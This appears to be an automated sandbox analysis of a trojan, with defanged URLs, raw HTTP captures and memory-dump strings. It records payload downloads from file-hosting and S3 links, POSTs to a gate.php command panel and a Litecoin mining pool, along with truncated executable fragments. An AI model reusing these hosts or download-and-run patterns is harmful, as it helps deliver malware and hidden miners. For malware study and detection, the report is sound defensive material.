hxxp://w013064.blob2.ge.tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download | 54.217.102.175 |
hxxp://crl.verisign.com/pca3-g2.crl | 23.37.37.163 |
hxxp://csc3-2010-crl.verisign.com/CSC3-2010.crl | 23.37.37.163 |
hxxp://w524017.open.ge.tt/1/files/9a2RqWN1/0/blob?download | 54.247.122.87 |
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl | 23.37.37.163 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 212.30.134.177 |
ltc.give-me-coins.com | 66.85.187.133 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=11504
Date: Sun, 11 May 2014 03:57:55 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
1401CF3DB40B609892HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT..Accept-Ranges: bytes..ETag: "806f4cbb43dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 18..Cache-Control: max-age=11504..Date: Sun, 11 May 2014 03:57:55 GMT..Connection: keep-alive..X-CCC: RU..X-CID: 2..1401CF3DB40B609892..
GET /api/1/files/9a2RqWN1/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://w524017.open.ge.tt/1/files/9a2RqWN1/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w524017.open.ge.tt/1/files/9a2RqWN1/0/blob?download..Connection: keep-alive..Transfer-Encoding: chunked..0......
GET /api/1/files/6bcJvOg1/0/blob?download HTTP/1.1
Host: ge.tt
HTTP/1.1 307 Temporary Redirect
location: hXXp://w269456.open.ge.tt/1/files/6bcJvOg1/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w269456.open.ge.tt/1/files/6bcJvOg1/0/blob?download..Connection: keep-alive..Transfer-Encoding: chunked..0..
GET /1/files/9a2RqWN1/0/blob?download HTTP/1.1
Host: w524017.open.ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798
connection: keep-alive
transfer-encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798..connection: keep-alive..transfer-encoding: chunked..0..
GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "ca32618c4340c20d208aad10883a84d6:1399755910"
Last-Modified: Sat, 10 May 2014 21:05:10 GMT
Accept-Ranges: bytes
Content-Length: 37283
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 CA..140510210002Z..140524210002Z0..h0!.....V..t..'.F(z....121202220203Z0!.... .;...9.7.......090826054212Z0!...\.)../F..^p..s...100722072726Z0!......P....A.x......100708154305Z0!.......O#.`n.5j.9...100930040708Z0!..../..8~p...h......091006052837Z0!.....(../L....--aK..091029040207Z0!...aW.....B.!.0..t..090909121104Z0!...g,..4(vv....mJ_..100514054218Z0!.....V.....(..-..p..090826162211Z0!....O..,J.N.n...Ly..091028032204Z0!....42r...I.Y@...3..100526162150Z0!.........}..Dt...!..090922192227Z0!.......2l....7i..?..101109030426Z0!.....p%...l,AogP....100523060224Z0!...,.P.C......*.....100303082219Z0!...NRPL.............100413090225Z0!....1w....d.&..8....091026111702Z0!......F....e........090608081352Z0!.....6..d6.7..4.....100924123027Z0!....$..*...s..&s....100219210742Z0!......Q_.G..|.......091009145530Z0!........>..O...=72..100616160934Z0!....Xlm$|".su.......090619194406Z0!......J)..E......C..100922142243Z0!...D......u.y.Iy{k..101026130323Z0!...El...)>..W..<K...101004225456Z0!...p..wy.i.zc...X...091117001921Z0!.....,{..^..........091203194409Z0!....B....d...*.P.@..100705023431Z0!.......m. .V.....~..101111134216Z0!...2.R.i.{..........091029071123Z0!...`F..q2..O.:......100602074221Z0!...a{.-...@...'.....100723194022Z0!........fW.y.,s.....101011182226Z0!....Um..}.8)........100324085953Z0!....,u.boxr....Z....
<<
<<< skipped >>>
GET /CSC3-2009.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "1bafe804fc42b27d2a70335cb2162128:1399755910"
Last-Modified: Sat, 10 May 2014 21:05:10 GMT
Accept-Ranges: bytes
Content-Length: 2249
Date: Sun, 11 May 2014 03:57:53 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA..140510210003Z..140524210003Z0...0!.....zOR.D...,oMa...090525061903Z0!......t.o=(..(..G...090520231844Z0!... ....M...m.Q.&...090517075442Z0!...T.Ay(..U...:_|...090608072333Z0!... .(.....F..9.....090805090059Z0!.......P..._}..;.x..090714150126Z0!.....5=.qOV[.cyg.&..090528172131Z0!...K...=$.6.........090521015930Z0!...-H...D...tDXUN...090527062050Z0!.......-.'@..<B{....090525110212Z0!......x..m*[.7.h#"..090702070220Z0!.....%.o.....kT.....090527062152Z0!..!.*;....)..Ef..k..090529084018Z0!..#.}h..."..........090527050204Z0!..$.I^./@.:7.p.,v...090521201736Z0!..&.5{.....Q;D......090521184343Z0!..&...T[.~y.........090903081104Z0!...q..m...G..i^.....090521025017Z0!../a.nS..[lA.lCB....090527045238Z0!..0.....R..iX.px....090605052910Z0!..2.h..).n......p;..090713144756Z0!..:.............. ..090605052934Z0!..;.0.*.v..*....P...090601001940Z0!..?..}p 2I..o.\..u..090527061825Z0!..?....@.Z`......l..090527022214Z0!..B..h~a..]..L.2....100512125735Z0!..B.U..ZF...........090527041620Z0!..F'....?xxnx.6Q....090528003453Z0!..F|A..r....#.@.&...090527062259Z0!..L.r....F..^..i.t..090608130549Z0!..Q...Y...Exm.._7...090520225737Z0!..TH..~.. ..({......090723115618Z0!..U.59Z..[.G.RmyR1..090527071534Z0!..V ].h.../".V<8-...090611075746Z0!..gHT...j5zdG....K..090521205535Z0!..mje.......;.......090521012215Z0!..p^..E.{.>.........09
<<
<<< skipped >>>
GET /pca3-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "072641a27cd10308fabc881f069f37c1:1396126208"
Last-Modified: Sat, 29 Mar 2014 20:50:08 GMT
Accept-Ranges: bytes
Content-Length: 1415
Date: Sun, 11 May 2014 03:57:53 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign Trust Network..140320000000Z..140630235959Z0...0!...=...X.FL...3..I..080403173458Z0!...SJs|.."E.G.......070412172616Z0!....E........W6.n...140129192923Z0!.......jvO..!....]..040401180422Z0!......\*....bO-.....080403173459Z0!....I..:.<....9..m..070412172523Z0!.........R.E!..=t...070522172634Z0!....}.....}.}.(q.C..040401180606Z0!...`.6..,...u.~x.:..080403173459Z0!.........wX.....~...080606171636Z0!..$.Jn>.t..d_j..."..040401180518Z0!.. ..N*(.}H..j......070412172308Z0!.. ..3.J......d..9..070522172711Z0!..50.h.:....s.K"....040401180542Z0!..7_f...s...........080403173459Z0!..<.J..y..)..~x7.e..080606171735Z0!..NS.c.f......7.p...070412172213Z0!..N.k;..-...9J..-...070522172748Z0!..Q..2pRv.WC.:..f...030109181346Z0!..Tq..m..*..........140129192925Z0!..^..CX4.3... F.R...070522172548Z0!..^..)..P3...7...L..080403173459Z0!..e........O.^.S....080403173457Z0!..jP....Wv..[.v.5H..070412172102Z0!..nk.l.!y.~...7G@...070412171752Z0!..r.q.I-Ln./........080403173458Z0!..t8....D...........080606171524Z0!..t.xn.tS....O_.....070412171951Z0!..v......Qnw..W.g...140129192921Z0...*.H................V.!F.Y..p.V......s..%..*l.z=...R./.F....q.......D.t......0b..?.R:9.(.|.....VBp8.......PZ...[o\p...U...........$).V.D....B@......
<<
<<< skipped >>>
GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "895f8ccd92dfec674c94f0d04d1b63bc:1396128308"
Last-Modified: Sat, 29 Mar 2014 21:25:08 GMT
Accept-Ranges: bytes
Content-Length: 533
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..140320000000Z..140630235959Z0...*.H.............}...a.D[..8..i.....g8..S..tt..a.e.B]..v.l9.m.....~.G(l...G..#z{...Za..F.q....2^X..w.i'.&..n...4v8. &|/Y.B..%..J..g0."k.0....A..7.)h...=5....'Z........y.Ye.......M.._5.9..B.*.. .4z@.7#...... UL.F......iDg..6...'z$.E.E..*..g...2.@D.....&v...o..>..k1N...P...iHTTP/1.1 200 OK..Server: Apache..ETag: "895f8ccd92dfec674c94f0d04d1b63bc:1396128308"..Last-Modified: Sat, 29 Mar 2014 21:25:08 GMT..Accept-Ranges: bytes..Content-Length: 533..Date: Sun, 11 May 2014 03:57:54 GMT..Connection: keep-alive..Content-Type: application/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..140320000000Z..140630235959Z0...*.H.............}...a.D[..8..i.....g8..S..tt..a.e.B]..v.l9.m.....~.G(l...G..#z{...Za..F.q....2^X..w.i'.&..n...4v8. &|/Y.B..%..J..g0."k.0....A..7.)h...=5....'Z........y.Ye.......M.._5.9..B.*.. .4z@.7#...... UL.F......iDg..6...'z$.E.E..*..g...2.@D.....&v...o..>..k1N...P...i..
<<
<<< skipped >>>
GET /gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: TeHG2XT52p6a12Oy8ifa0G2eLQCSJvBJzOirYekEb9zoHGypEejtZoDD0ROgw8at
x-amz-request-id: 9009543A81F42AD2
Date: Sun, 11 May 2014 03:57:43 GMT
Content-Disposition: attachment;
Last-Modified: Sun, 02 Mar 2014 22:54:08 GMT
ETag: "bb1f7298813a025110816dbf3abf16c1-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1511936
Server: AmazonS3
..............................................................................................S.R.E.S.U._.Y.E.K.H.........................0...E.N.I.H.C.A.M._.L.A.C.O.L._.Y.E.K.H.........................@...R.E.S.U._.T.N.E.R.R.U.C._.Y.E.K.H.........................>...G.I.F.N.O.C._.T.N.E.R.R.U.C._.Y.E.K.H.........................B...T.O.O.R._.S.E.S.S.A.L.C._.Y.E.K.H.........................>.............2.3.m.e.t.s.y.S.\.>.t.o.o.R.m.e.t.s.y.S.<.......2.3.m.e.t.s.y.S.......`...^...\...J.........................................................>.t.o.o.R.m.e.t.s.y.S.<.......>.t.o.o.R.m.e.t.s.y.S.<.......h...f...d...J..........................................................................................................................................................................................................................................7.7.7.7.7.7.7.7.7.7.7.7h7d7`7\7X7T7P7L7H7D7@7<7874707,7(7$7 7.7.7.7.7.7.7.7.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6|6x6t6p6l6h6d6`6\6X6T6P6L6H6D6@6<6864606,6(6$6 6.6.6.6.6.6.5.5.5.5.5.5.5.5.5.5...........0.0.0.0|0x0t0p0l0h0d0`0\0X0T0P0L0H0D0@0<0804000,0(0$0 0.0.0.0....H......5.5.5.5.5.5.5.4.4.4.4.4.4.4.4.4.4.4.4.2p2l2h2d2`2\2X2T2P2L2H2D2@2<2824202,2(2$2 2.2.2.2.2.2.2.2.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1|1x1t1p1l1h1d1`1\1X1T1P1L1H1D1@1<1.1.0.0.0.0.0.0.0.0.......p...0.040 0.0.0.0.......@.2.1.1.1.1.1.1.1.1.1r1b1R1B121"1.1.0.0.0.0.0....4..0.=A<.<.<o737.7.6.6.6.6.6i6U6F616.5.5
<<
<<< skipped >>>
POST /wordpress/1/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: popdown.me
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
POST /wordpress/1/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: popdown.me
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
GET /streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download HTTP/1.1
Host: w013064.blob2.ge.tt
Connection: Keep-Alive
HTTP/1.1 200 OK
date: Sun, 11 May 2014 03:57:49 GMT
last-modified: Thu, 08 May 2014 12:19:32 GMT
etag: "6e7e17710d7ca996bf5647cba9efbcee-1"
accept-ranges: bytes
content-type: application/x-msdownload
content-length: 278528
server: gbs
access-control-allow-origin: *
content-disposition: attachment
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vkS................................. ........@.. ....................................@.................................\...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............>..............@..B........................H....... ...<...........H!...............................................(....(....*.0.......... ....(....r...p(....o.........(....o....s.... ....(....r...p(....o....o....(.....(....r-..po....... ..........i].a....X....i2......(.........(.... ....(....rI..p(....o....(....t.....o......o.........*:~......o....&*...(....*................lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP"..N.........a.o.i.r.a.s.........Czj7QiJMbypJOmgptLlia/ohTG8qTTpoaUtGYmtCIUxvKk06aClLRmJrQiFMbypNOmgpS0Zia0IhTG8qzTpoKUVZ2GVClUWiC/U7JORqEgoCMQE8HUUqSAlEayUDBSxOOE9IKBoaXCVmCwViZQM8CiBVDExlS29hZiFMbypNOmh5DkZiJ0MiTGdcJmloKUtGYmtCIaxvKEwxaSFLRpJrQiFsbypNOmgpZUBja0IBTG8qbTtoKUsGYmtiIUxvOk06bClLRmJrQiFIbypNOmgpS0YCakIhXG8qTTpoKUhGIu5CIVxvKl06aClLVmJrUiFMbypNOngpS0Zia0IhTG8qTe5tKEsRYmtCIWxuKq0 aClLRmJrQiFMbypNOmgpS0ZiawIgTGMqTTpoKUtGYmtCIUxvKk06aClLRmJrQiFMbypNOmgpS0Zia0IhTG8qTTpoKUtGYmtCIUxvCk06YClLRmJrQiFMb
<<
<<< skipped >>>
GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "6796efe0dffeb866d24738665300f835:1399756509"
Last-Modified: Sat, 10 May 2014 21:15:09 GMT
Accept-Ranges: bytes
Content-Length: 126066
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...m0...T...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://www.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA..140510210004Z..140524210004Z0...60!....c..k....D.k.....120708062201Z0!... _...u.t.=.<.&...130218061114Z0!...&..].....P.k.:...120125130117Z0!...7P.x....8.Q...s..130227010252Z0!...J.....Q..Y.[.....110404153956Z0!...d...=..q!_...g9..130729145216Z0!...l.....h2<.H......120329152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......0...121221080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v.....w..140423054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...iM..121102230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M83...140108164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID{]..101228182208Z0!....b^......{d.J'...130102154110Z0!......0..........I..130912181631Z0!....6e...~..T.......130131012247Z0!.........bD#*u......130226223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v..........n..120724160733Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!....140328205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....@T..130117000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,.e..121031192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|...J.....120518121623Z0!...<%a.=.d.......O..120424164254Z0!...@........... .a..121109212441Z0!...L.&L..o.8..=6....110311141238Z0!...L...5...s $.=.=..130205142241Z0!...O.c.........t....130109132228Z0!...X.BS.G]T.l.w.i..
<<
<<< skipped >>>
GET /1/files/6bcJvOg1/0/blob?download HTTP/1.1
Host: w269456.open.ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://w013064.blob2.ge.tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download
connection: keep-alive
transfer-encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w013064.blob2.ge.tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download..connection: keep-alive..transfer-encoding: chunked..0..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
WScript.exe_2280:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
msvcrt.dll
msvcrt.dll
OLEAUT32.dll
OLEAUT32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
wscript.exe
wscript.exe
advapi32.dll
advapi32.dll
kernel32.dll
kernel32.dll
%s%s.DLL
%s%s.DLL
wintrust.dll
wintrust.dll
%d.%d
%d.%d
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
SOFTWARE\Classes\%s\%s
SOFTWARE\Classes\%s\%s
0x%8X
0x%8X
CreateURLMonikerEx
CreateURLMonikerEx
urlmon.dll
urlmon.dll
@@8X%u
@@8X%u
RegCreateKeyA
RegCreateKeyA
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExW
RegOpenKeyExW
ReportEventW
ReportEventW
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumThreadWindows
EnumThreadWindows
wscript.pdb
wscript.pdb
stdole2.tlbWWW
stdole2.tlbWWW
.ObjectWW
.ObjectWW
KeyW
KeyW
WindowsFolderWWW4
WindowsFolderWWW4
%CopyFolderWWL
%CopyFolderWWL
Windows Script Host (Ver 5.6)W)
Windows Script Host (Ver 5.6)W)
Windows Script Host Application InterfaceW%
Windows Script Host Application InterfaceW%
Windows Script Host Object
Windows Script Host Object
ebstrCmdLineW
ebstrCmdLineW
7Â8t8x8
7Â8t8x8
5Q5F5
5Q5F5
Software\Microsoft\Windows Script Host\Settings
Software\Microsoft\Windows Script Host\Settings
Windows Script Host
Windows Script Host
WScript.CreateObject
WScript.CreateObject
WSHRemote.Execute
WSHRemote.Execute
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s.mui
.\%s\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s\%s.mui
%s\%s
%s\%s
Microsoft (R) Windows Based Script Host
Microsoft (R) Windows Based Script Host
5.7.0.16599
5.7.0.16599
Microsoft (R) Windows Script Host
Microsoft (R) Windows Script Host
(Windows Script Host (debugging disabled)
(Windows Script Host (debugging disabled)
Windows Script Host Error
Windows Script Host Error
Windows Script Host Input Error
Windows Script Host Input Error
This Unicode version of Windows Script Host will only execute under Windows NT.
This Unicode version of Windows Script Host will only execute under Windows NT.
Please use the ANSI version of Windows Script Host."
Please use the ANSI version of Windows Script Host."
WScript execution time was exceeded on script "%1!ls!".
WScript execution time was exceeded on script "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.<Attempt to execute Windows Script Host while it is disabled><pre>Missing job name.*Unicode is not supported on this platform.</pre><pre><The Windows Script Host settings have been reset to default><pre>Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.</pre><pre>Win32 Error 0x%X</pre><pre>Windows Script Host(Windows Script Host (debugging disabled)</pre><pre>Usage: WScript scriptname.extension [option...] [arguments...]</pre><pre>Use engine for executing script</pre><pre>Changes the default script host to CScript.exe</pre><pre>Changes the default script host to WScript.exe (default)</pre><pre>Prevent logo display: No banner will be shown at execution time</pre><pre>#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.</pre><pre>%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.</pre><b>%original file name%.exe_1180_rwx_00D10000_0000F000:</b><pre>u.iD$</pre><pre>.WfxP</pre><b>%original file name%.exe_1180_rwx_04AA0000_0000A000:</b><pre>d.buh</pre><b>%original file name%.exe_1180_rwx_675A6000_00003000:</b><pre>.Qg<-Qg><pre>*Rg`.Rg|)RgL Rg</pre><b>WScript.exe_3524:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>USER32.dll</pre><pre>msvcrt.dll</pre><pre>OLEAUT32.dll</pre><pre>ole32.dll</pre><pre>VERSION.dll</pre><pre>wscript.exe</pre><pre>advapi32.dll</pre><pre>kernel32.dll</pre><pre>%s%s.DLL</pre><pre>wintrust.dll</pre><pre>%d.%d</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>SOFTWARE\Classes\%s\%s</pre><pre>0x%8X</pre><pre>CreateURLMonikerEx</pre><pre>urlmon.dll</pre><pre>@@8X%u</pre><pre>RegCreateKeyA</pre><pre>RegCloseKey</pre><pre>RegOpenKeyA</pre><pre>RegDeleteKeyA</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExW</pre><pre>ReportEventW</pre><pre>RegEnumKeyExA</pre><pre>RegOpenKeyExA</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>MsgWaitForMultipleObjects</pre><pre>EnumThreadWindows</pre><pre>wscript.pdb</pre><pre>stdole2.tlbWWW</pre><pre>.ObjectWW</pre><pre>KeyW</pre><pre>WindowsFolderWWW4</pre><pre>%CopyFolderWWL</pre><pre>Windows Script Host (Ver 5.6)W)</pre><pre>Windows Script Host Application InterfaceW%</pre><pre>Windows Script Host Object</pre><pre>ebstrCmdLineW</pre><pre>7Â8t8x8</pre><pre>5Q5F5</pre><pre>Software\Microsoft\Windows Script Host\Settings</pre><pre>Windows Script Host</pre><pre>WScript.CreateObject</pre><pre>WSHRemote.Execute</pre><pre>Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}</pre><pre>.\%s.mui</pre><pre>.\%s\%s.mui</pre><pre>%s\%s.mui</pre><pre>%s\%s\%s.mui</pre><pre>%s\%s</pre><pre>Microsoft (R) Windows Based Script Host</pre><pre>5.7.0.16599</pre><pre>Microsoft (R) Windows Script Host</pre><pre>(Windows Script Host (debugging disabled)</pre><pre>Windows Script Host Error</pre><pre>Windows Script Host Input Error</pre><pre>This Unicode version of Windows Script Host will only execute under Windows NT.</pre><pre>Please use the ANSI version of Windows Script Host."</pre><pre>WScript execution time was exceeded on script "%1!ls!".</pre><pre>Script execution was terminated.1Could not locate automation class named "%1!ls!".</pre><pre>Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).</pre><pre>Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.<Attempt to execute Windows Script Host while it is disabled><pre>Missing job name.*Unicode is not supported on this platform.</pre><pre><The Windows Script Host settings have been reset to default><pre>Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.</pre><pre>Win32 Error 0x%X</pre><pre>Windows Script Host(Windows Script Host (debugging disabled)</pre><pre>Usage: WScript scriptname.extension [option...] [arguments...]</pre><pre>Use engine for executing script</pre><pre>Changes the default script host to CScript.exe</pre><pre>Changes the default script host to WScript.exe (default)</pre><pre>Prevent logo display: No banner will be shown at execution time</pre><pre>#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.</pre><pre>%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.</pre><b>nt32.exe_1324_rwx_00D20000_00010000:</b><pre>u.iD$</pre><pre>.WexP</pre><b>nt32.exe_1324_rwx_675A6000_00003000:</b><pre>.Qg<-Qg><pre>*Rg`.Rg|)RgL Rg</pre><b>cvtres.exe_3500:</b><pre>.text</pre><pre>``.data</pre><pre>.rdata</pre><pre>`@.bss</pre><pre>.idata</pre><pre>.main</pre><pre>.bxpck</pre><pre>66665\\\\</pre><pre>\\\\5\\\\</pre><pre>666656666</pre><pre>libgcj-12.dll</pre><pre>JSON decode of %s failed</pre><pre>http://</pre><pre>https://</pre><pre>stratum tcp://</pre><pre>http://%s</pre><pre>cpuminer 2.3.2</pre><pre>accepted: %lu/%lu (%.2f%%), %s khash/s %s</pre><pre>DEBUG: reject reason: %s</pre><pre>DEBUG: job_id='%s' extranonce2=%s ntime=x</pre><pre>Starting Stratum on %s</pre><pre>...terminating workio thread</pre><pre>...retry after %d seconds</pre><pre>JSON decode 